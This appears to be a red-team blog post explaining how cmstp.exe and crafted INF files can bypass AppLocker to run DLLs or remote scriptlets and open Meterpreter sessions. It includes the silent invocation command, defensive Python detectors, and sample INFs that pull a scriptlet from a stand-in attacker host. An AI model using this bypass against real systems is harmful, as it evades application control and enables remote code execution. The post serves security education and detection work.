AppLocker Bypass – CMSTP

CMSTP is the binary associated with the Microsoft Connection Manager Profile Installer. It accepts INF files, which can be weaponised with malicious commands to execute arbitrary code in the form of scriptlets (SCT) or DLLs. It is a trusted Microsoft binary located in the following two Windows directories:

C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe

AppLocker default rules permit execution of binaries in these folders, so cmstp.exe can be used as a bypass method. Oddvar Moe initially discovered that this binary can be used to bypass AppLocker and UAC and published his research on his blog.

DLL

The Metasploit Framework can be used to generate malicious DLL files via msfvenom.

The Metasploit multi/handler module needs to be configured to receive the connection.

CMSTP – Metasploit Multi Handler

When the malicious INF file is supplied to cmstp, the code will be executed in the background.

cmstp.exe /s cmstp.inf
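Because cmstp.exe lives in directories AppLocker trusts by default, the invocation above is what a defender has to spot in process-creation telemetry. The following detection logic is an added example written for this post, not code from the original article or from Metasploit: it scores constructed process-creation events (a simplified form of Sysmon Event ID 1 / Security 4688 data; the field names Image, CommandLine and ParentImage are this script's own assumption, not a fixed schema) and alerts when cmstp.exe is given an INF file, raising severity for the silent switch and for script-host parents.

```python
"""Flag process-creation events in which cmstp.exe installs an INF profile.

Added detection example for this post; not code from the original article.
Field names and the sample events below are constructed assumptions.
"""
import re
from typing import Dict, List

# The two locations named in the post; AppLocker default rules allow both.
CMSTP_IMAGES = {
    r"c:\windows\system32\cmstp.exe",
    r"c:\windows\syswow64\cmstp.exe",
}
# Parents that rarely launch a VPN profile installer in normal use (assumed list).
SCRIPT_HOST_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

INF_ARGUMENT = re.compile(r"\S+\.inf\b", re.IGNORECASE)
SILENT_SWITCH = re.compile(r"(?:^|\s)/s(?:\s|$)", re.IGNORECASE)


def triage(event: Dict[str, str]) -> Dict[str, object]:
    """Return {'alert': bool, 'severity': str, 'reasons': [...]} for one event."""
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    reasons: List[str] = []

    if image not in CMSTP_IMAGES:
        return {"alert": False, "severity": "none", "reasons": reasons}
    if not INF_ARGUMENT.search(cmdline):
        # cmstp.exe without an INF argument does not install a profile.
        return {"alert": False, "severity": "none", "reasons": reasons}

    reasons.append("cmstp.exe invoked with an INF file")
    if SILENT_SWITCH.search(cmdline):
        reasons.append("silent installation (/s) suppresses the Connection Manager UI")
    if parent in SCRIPT_HOST_PARENTS:
        reasons.append(f"launched from a shell or script host: {parent}")

    severity = "high" if len(reasons) >= 2 else "medium"
    return {"alert": True, "severity": severity, "reasons": reasons}


# Constructed sample events for this example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": "cmstp.exe /s cmstp.inf",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r'"C:\Windows\System32\cmstp.exe" C:\ProgramData\CorpVPN\corpvpn.inf',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": "cmstp.exe /?",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe cmstp.inf",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def alerts_for(events: List[Dict[str, str]]):
    """Return (index, triage result) pairs for the events that alert."""
    return [(i, triage(e)) for i, e in enumerate(events) if triage(e)["alert"]]


if __name__ == "__main__":
    for i, result in alerts_for(SAMPLE_EVENTS):
        print(i, result["severity"], "; ".join(result["reasons"]))
```

An interactive install of a corporate profile from Explorer still alerts at medium severity, which is deliberate: the post's point is that the binary itself is allowed, so the INF argument is the event worth reviewing, and the silent switch plus a shell parent is what lifts it to high.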

CMSTP – INF Execution Locally

A Meterpreter session will open from the DLL execution.

CMSTP – Meterpreter via DLL Execution

SCT

Besides DLL files, cmstp is also able to run SCT files, which extends the usability of this binary during red team operations. Nick Tyrer initially presented this capability on Twitter.

Nick Tyrer has also written a scriptlet called powersct.sct, which can be used as an alternative way to execute PowerShell commands when native PowerShell is blocked. The UnRegisterOCXSection needs to contain the URL of the scriptlet. The final INF file needs to contain the following:

Upon execution of the INF file a new command prompt window will open, which is an indication that the code has been executed successfully.

CMSTP – INF Execution with Scriptlet

A Meterpreter session will open.

CMSTP – Meterpreter via SCT Execution

Conclusion

Usage of the CMSTP binary for bypassing AppLocker restrictions and executing code is . CMSTP needs INF files and upon execution generates a CMP file, which is the Connection Manager settings file. Both of these files are plain text files and are unlikely to trigger any alerts. Therefore these two files need to be monitored as indicators of compromise if the cmstp.exe binary cannot be blocked by an AppLocker rule, since threat actors have started using this technique.
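Since the INF and CMP files are plain text, they can be triaged statically once collected. The following is an added example for this post, not code from the original article: a minimal INF section parser (written here, not a Windows API) and a check that looks in the UnRegisterOCXSection the post names, or in whichever section an UnRegisterOCXs directive points to, for remote URLs or scriptlet/DLL references, and reports URLs found anywhere else as lower-priority findings. The three INF texts are constructed samples; the entry inside the OCX section uses placeholder fields and is not a reproduction of a real profile.

```python
"""Static triage of INF files handed to cmstp.exe.

Added example for this post, not code from the original article. The parser
is a minimal one written here; the sample INF texts are constructed and the
entry format inside the OCX section is a placeholder, not a real profile.
"""
import re
from typing import Dict, List

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
SCRIPTLET_OR_DLL = re.compile(r"\.(?:sct|dll)\b", re.IGNORECASE)


def parse_inf(text: str) -> Dict[str, List[str]]:
    """Return {section name (lower-case): [entry lines]}; ';' comments are dropped."""
    sections: Dict[str, List[str]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # INF comments start with ';'
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
            continue
        sections.setdefault(current, []).append(line)
    return sections


def triage_inf(text: str) -> List[str]:
    """Return findings for one INF text; an empty list means nothing of note."""
    sections = parse_inf(text)
    findings: List[str] = []

    # The post names UnRegisterOCXSection as the place the scriptlet URL goes;
    # an UnRegisterOCXs=<name> directive can point at a differently named section.
    target_names = {"unregisterocxsection"}
    for entries in sections.values():
        for entry in entries:
            key, sep, value = entry.partition("=")
            if sep and key.strip().lower() == "unregisterocxs":
                target_names.add(value.strip().lower())

    for name in sorted(target_names):
        for entry in sections.get(name, []):
            url = REMOTE_URL.search(entry)
            if url:
                findings.append(f"[{name}] references remote content: {url.group(0)}")
            elif SCRIPTLET_OR_DLL.search(entry):
                findings.append(f"[{name}] references a scriptlet or DLL: {entry}")

    # A URL anywhere else in the profile is a lower-priority finding.
    for name, entries in sections.items():
        if name in target_names:
            continue
        for entry in entries:
            url = REMOTE_URL.search(entry)
            if url:
                findings.append(f"[{name}] contains a URL: {url.group(0)}")
    return findings


# Constructed sample: remote scriptlet referenced from the section the post names.
SUSPICIOUS_INF = """\
[version]
Signature=$chicago$
AdvancedINF=2.5

[UnRegisterOCXSection]
placeholder.dll,,https://attacker.invalid/powersct.sct

[Strings]
ServiceName="CorpVPN"
"""

# Constructed sample: same section reached through a renamed directive target.
RENAMED_INF = """\
[version]
Signature=$chicago$

[DefaultInstall]
UnRegisterOCXs=Cleanup

[Cleanup]
placeholder.dll,,https://attacker.invalid/powersct.sct
"""

# Constructed sample of an ordinary-looking profile with no remote references.
BENIGN_INF = """\
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
CopyFiles=Profile.Files

[Profile.Files]
corpvpn.cms  ; connection settings shipped with the profile

[Strings]
ServiceName="CorpVPN"
ShortSvcName="CorpVPN"
"""

if __name__ == "__main__":
    for label, text in (("suspicious", SUSPICIOUS_INF), ("renamed", RENAMED_INF), ("benign", BENIGN_INF)):
        print(label, triage_inf(text) or "no findings")
```

Run this over INF and CMP files written to disk around a cmstp.exe execution; a profile whose OCX section pulls content from a URL has no legitimate reason to do so in a corporate VPN deployment and is the artefact the conclusion says to watch for.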